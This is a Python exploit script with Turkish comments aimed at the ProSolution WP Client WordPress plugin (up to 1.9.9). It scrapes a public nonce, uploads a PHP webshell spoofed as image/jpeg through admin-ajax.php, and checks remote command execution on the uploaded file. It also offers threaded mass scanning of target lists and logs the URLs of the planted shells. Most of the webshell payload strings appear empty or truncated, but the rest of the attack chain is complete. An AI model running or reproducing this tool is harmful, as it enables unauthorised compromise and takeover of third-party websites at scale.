#!/usr/bin/env python3 """ ProSolution WP Client — Unauthenticated File Upload & RCE Scanner Etkilenen Sürüm : <= 1.9.9 Zafiyet : Kimlik doğrulamasız PHP dosyası yükleme (MIME Spoofing) Nonce Kaynağı : [prosolfrontend] shortcode içeren public sayfa → prosolObj.nonce Saldırı Zinciri : 1. Public sayfadan prosolObj.nonce çek 2. shell.php dosyasını image/jpeg MIME tipiyle yükle 3. /wp-content/uploads/prosolwpclient/[random].php → RCE """ import requests import argparse import json import re import sys from concurrent.futures import ThreadPoolExecutor, as_completed from threading import Lock requests.packages.urllib3.disable_warnings() G = "\033[92m"; R = "\033[91m"; Y = "\033[93m" C = "\033[96m"; D = "\033[90m"; B = "\033[1m"; X = "\033[0m" _lock = Lock() _counter = [0] def out(msg): with _lock: sys.stdout.write("\r" + " " * 80 + "\r") sys.stdout.write(msg + "\n") sys.stdout.flush() def progress(total): with _lock: _counter[0] += 1 n = _counter[0] pct = n * 100 // total bar = "█" * (pct // 5) + "░" * (20 - pct // 5) sys.stdout.write(f"\r[{bar}] {n}/{total} ({pct}%) ") sys.stdout.flush() # ══════════════════════════════════════════════════════════════ # NONCE ÇEKME — prosolObj.nonce # ══════════════════════════════════════════════════════════════ # prosolObj içindeki nonce için pattern'ler NONCE_PATTERNS = [ # Standart prosolObj.nonce r'prosolObj\s*=\s*\{[^}]*?"nonce"\s*:\s*"([a-zA-Z0-9]{8,})"', # wp_localize_script farklı format r'"nonce"\s*:\s*"([a-zA-Z0-9]{8,})"', # data-nonce attribute r'data-nonce=["\']([a-zA-Z0-9]{8,})["\']', # var prosolObj doğrudan r'var\s+prosolObj\s*=\s*\{[^}]*?"nonce"\s*:\s*"([a-zA-Z0-9]{8,})"', # security field r'"security"\s*:\s*"([a-zA-Z0-9]{8,})"', ] # [prosolfrontend] shortcode içerebilecek yaygın slug'lar COMMON_SLUGS = [ "/jobs", "/careers", "/apply", "/frontend", "/prosol", "/client", "/portal", "/work", "/employment", "/vacancies", "/positions", "/job-listings", "/job-board", "/opportunities", "/", "/home", "/about", "/contact", ] def extract_nonce_from_html(html): """HTML içinden prosolObj.nonce değerini çek.""" for pat in NONCE_PATTERNS: m = re.search(pat, html, re.S) if m: return m.group(1) return None def find_nonce(sess, base): """ [prosolfrontend] shortcode içeren sayfayı bul ve nonce çek. Önce sitemap, sonra yaygın slug'lar denenir. """ # 1. Ana sayfa try: r = sess.get(base, timeout=8, allow_redirects=True) if r.status_code == 200: n = extract_nonce_from_html(r.text) if n: return n, base except: pass # 2. Sitemap'ten sayfa URL'leri topla pages = [] for sm in ["/sitemap.xml", "/sitemap_index.xml", "/wp-sitemap.xml", "/page-sitemap.xml"]: try: r = sess.get(base + sm, timeout=5) if r.status_code == 200: urls = re.findall(r'(https?://[^<]+)', r.text) pages += [u for u in urls if not re.search(r'\.(jpg|png|gif|css|js|xml)$', u, re.I)] if len(pages) >= 20: break except: continue # 3. Yaygın slug'ları ekle for slug in COMMON_SLUGS: pages.append(base + slug) # 4. Tüm sayfaları tara (max 30) for url in pages[:30]: try: r = sess.get(url, timeout=5, allow_redirects=True) if r.status_code != 200: continue # [prosolfrontend] shortcode işlenmiş mi kontrol et if "prosolObj" not in r.text and "prosol" not in r.text.lower(): continue n = extract_nonce_from_html(r.text) if n: return n, url except: continue # 5. wp-json REST API dene for ep in ["/wp-json/prosol/v1/nonce", "/wp-json/prosolwpclient/v1/nonce"]: try: r = sess.get(base + ep, timeout=5) if r.status_code == 200: m = re.search(r'"nonce"\s*:\s*"([a-zA-Z0-9]{8,})"', r.text) if m: return m.group(1), f"rest:{ep}" except: continue # 6. admin-ajax.php ile nonce talep et ajax = base + "/wp-admin/admin-ajax.php" for action in ["prosol_get_nonce", "proSol_get_nonce", "prosol_nonce", "prosolwpclient_nonce"]: try: r = sess.post(ajax, headers={"X-Requested-With": "XMLHttpRequest"}, data={"action": action}, timeout=5) if r.status_code == 200: body = r.text.strip() if re.match(r'^[a-zA-Z0-9]{8,12}$', body): return body, f"ajax:{action}" m = re.search(r'"nonce"\s*:\s*"([a-zA-Z0-9]{8,})"', body) if m: return m.group(1), f"ajax:{action}:json" except: continue return None, None # ══════════════════════════════════════════════════════════════ # SHELL TİPLERİ # ══════════════════════════════════════════════════════════════ def build_shell(shell_type="system"): shells = { "system": b'', "passthru": b'', "exec": b'', "assert": b'', "b64": b'', "full": ( b'".$o."";} ?>' ), } return shells.get(shell_type, shells["system"]) # ══════════════════════════════════════════════════════════════ # YÜKLEME # ══════════════════════════════════════════════════════════════ def upload_shell(sess, base, nonce, shell_name="shell.php", shell_type="system"): """ PHP dosyasını image/jpeg MIME tipi ile yükle. security parametresi olarak nonce gönderilir. """ ajax = base + "/wp-admin/admin-ajax.php" files = { "files[]": ( shell_name, build_shell(shell_type), "image/jpeg" # ← MIME Spoofing — kritik bypass ) } data = { "action": "proSol_fileUploadProcess", "security": nonce # ← prosolObj.nonce buraya } try: r = sess.post(ajax, files=files, data=data, timeout=10) if r.status_code != 200: return {"status": "HTTP_ERR", "code": r.status_code} try: resp = r.json() except json.JSONDecodeError: return {"status": "JSON_ERR", "raw": r.text[:200]} files_info = resp.get("files", []) if not files_info: return {"status": "NO_FILES", "raw": r.text[:200]} info = files_info[0] shell_url = info.get("url", "").replace("\\/", "/") new_name = info.get("newfilename", "") extension = info.get("extension", "") renamed = info.get("rename_status", False) delete_url = info.get("deleteUrl", "").replace("\\/", "/") # PHP uzantısı korundu mu? if extension == "php" or shell_url.endswith(".php"): return { "status": "UPLOADED", "shell_url": shell_url, "new_name": new_name, "renamed": renamed, "delete_url": delete_url, } else: return { "status": "BLOCKED", "extension": extension, "raw": str(info)[:200], } except requests.exceptions.ConnectionError: return {"status": "CONN_ERR"} except requests.exceptions.Timeout: return {"status": "TIMEOUT"} except Exception as e: return {"status": "EXCEPTION", "err": str(e)} # ══════════════════════════════════════════════════════════════ # SHELL DOĞRULAMA # ══════════════════════════════════════════════════════════════ def verify_shell(sess, shell_url, cmd="id", timeout=8): """Yüklenen shell'i test et — komut çalışıyor mu?""" try: r = sess.get(shell_url, params={"cmd": cmd}, timeout=timeout, verify=False, headers={"User-Agent": "Mozilla/5.0"}) if r.status_code == 200: body = r.text.strip() if "uid=" in body and "gid=" in body: return "RCE_OK", body[:200] if len(body) > 0: return "RESPONSE", body[:200] return "NO_OUTPUT", "" except: return "CONN_ERR", "" # ══════════════════════════════════════════════════════════════ # TEKİL HEDEF KONTROLÜ # ══════════════════════════════════════════════════════════════ def check(target, args, total=1): if not target.startswith("http"): target = "http://" + target sess = requests.Session() sess.headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" sess.verify = False # Bağlantı testi try: r = sess.get(target, timeout=8, allow_redirects=True) base = r.url.rstrip("/") except: progress(total) return {"status": "UNREACH", "url": target} # ── Adım 1: Nonce çek ── nonce, nonce_src = find_nonce(sess, base) if not nonce: progress(total) return {"status": "NO_NONCE", "url": base} # ── Adım 2: Shell yükle ── result = upload_shell( sess, base, nonce, shell_name=args.shell_name, shell_type=args.shell_type ) result["url"] = base result["nonce"] = nonce result["nonce_src"] = nonce_src # ── Adım 3: Shell doğrula ── if result["status"] == "UPLOADED" and args.verify: rce_status, rce_out = verify_shell( sess, result["shell_url"], cmd=args.verify_cmd ) result["rce_status"] = rce_status result["rce_out"] = rce_out progress(total) return result # ══════════════════════════════════════════════════════════════ # ÇIKTI YAZICI # ══════════════════════════════════════════════════════════════ def print_result(res, fout=None): s = res["status"] u = res.get("url", "") if s == "UPLOADED": out(f"{G}[★ UPLOADED ] {u}") out(f" Nonce : {res.get('nonce','')} (kaynak: {res.get('nonce_src','')})") out(f" Shell URL : {res.get('shell_url','')}") out(f" Yeni Ad : {res.get('new_name','')} (renamed={res.get('renamed','')}){X}") rce = res.get("rce_status", "") if rce == "RCE_OK": out(f"{G} [✓ RCE OK ] {res.get('rce_out','')}{X}") elif rce == "RESPONSE": out(f"{Y} [~ RESP ] {res.get('rce_out','')}{X}") elif rce: out(f"{D} [- {rce:8s}] Shell erişilemiyor{X}") if fout: line = (f"UPLOADED {u} " f"shell={res.get('shell_url','')} " f"nonce={res.get('nonce','')} " f"rce={rce}\n") fout.write(line) fout.flush() elif s == "BLOCKED": out(f"{D}[- BLOCKED ] {u} ext={res.get('extension','?')}{X}") elif s == "NO_NONCE": out(f"{Y}[~ NO_NONCE ] {u} (prosolObj.nonce bulunamadı){X}") elif s == "HTTP_ERR": out(f"{R}[! HTTP_ERR ] {u} code={res.get('code')}{X}") elif s == "TIMEOUT": out(f"{D}[~ TIMEOUT ] {u}{X}") elif s == "CONN_ERR": out(f"{D}[~ CONN_ERR ] {u}{X}") elif s == "UNREACH": out(f"{D}[~ UNREACH ] {u}{X}") else: out(f"{Y}[? {s:10s}] {u} {res.get('raw','')[:80]}{X}") # ══════════════════════════════════════════════════════════════ # MAIN # ══════════════════════════════════════════════════════════════ def main(): ap = argparse.ArgumentParser( description="ProSolution WP Client <= 1.9.9 — File Upload & RCE Scanner", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Örnekler: # Tekil hedef python prosol_upload.py -u http://hedef.com # Shell doğrulama ile python prosol_upload.py -u http://hedef.com --verify --verify-cmd "whoami" # Toplu tarama python prosol_upload.py -l targets.txt -t 20 -o sonuclar.txt # Proxy ile (Burp Suite) python prosol_upload.py -u http://hedef.com --proxy http://127.0.0.1:8080 # Full shell + doğrulama python prosol_upload.py -u http://hedef.com --shell-type full --verify """ ) group = ap.add_mutually_exclusive_group(required=True) group.add_argument("-u", "--url", help="Tekil hedef URL") group.add_argument("-l", "--list", help="Hedef listesi dosyası") ap.add_argument("-t", "--threads", type=int, default=10) ap.add_argument("-o", "--output", default="uploaded.txt") ap.add_argument("--shell-name", default="shell.php") ap.add_argument("--shell-type", choices=["system","passthru","exec","assert","b64","full"], default="system") ap.add_argument("--verify", action="store_true", help="Yükleme sonrası RCE doğrula") ap.add_argument("--verify-cmd", default="id") ap.add_argument("--proxy", help="Proxy URL") ap.add_argument("--timeout", type=int, default=10) args = ap.parse_args() # ── Tekil hedef ── if args.url: print(f"\n{B}[*] Hedef : {args.url}") print(f"[*] Shell : {args.shell_name} ({args.shell_type})") print(f"[*] Doğrulama : {'Evet → ' + args.verify_cmd if args.verify else 'Hayır'}{X}\n") res = check(args.url, args, total=1) print_result(res) if res["status"] == "UPLOADED": with open(args.output, "w") as f: f.write(f"{res.get('shell_url','')}\n") print(f"\n{G}[+] Kaydedildi → {args.output}{X}") return # ── Toplu tarama ── with open(args.list) as f: targets = [l.strip() for l in f if l.strip()] total = len(targets) _counter[0] = 0 print(f"\n{B}[*] {total} hedef | ProSolution <= 1.9.9 | threads={args.threads}{X}\n") stats = {} with open(args.output, "w") as fout: with ThreadPoolExecutor(max_workers=args.threads) as ex: futs = {ex.submit(check, t, args, total): t for t in targets} for fut in as_completed(futs): res = fut.result() s = res["status"] stats[s] = stats.get(s, 0) + 1 print_result(res, fout) sys.stdout.write("\n") print(f"\n{B}{'─'*60}") for k, v in sorted(stats.items(), key=lambda x: -x[1]): bar = "█" * min(v, 30) print(f" {k:22s}: {v:4d} {bar}") print(f"{'─'*60}") print(f" Yüklenen shell'ler → {args.output}") print(f"{'─'*60}{X}") if __name__ == "__main__": main()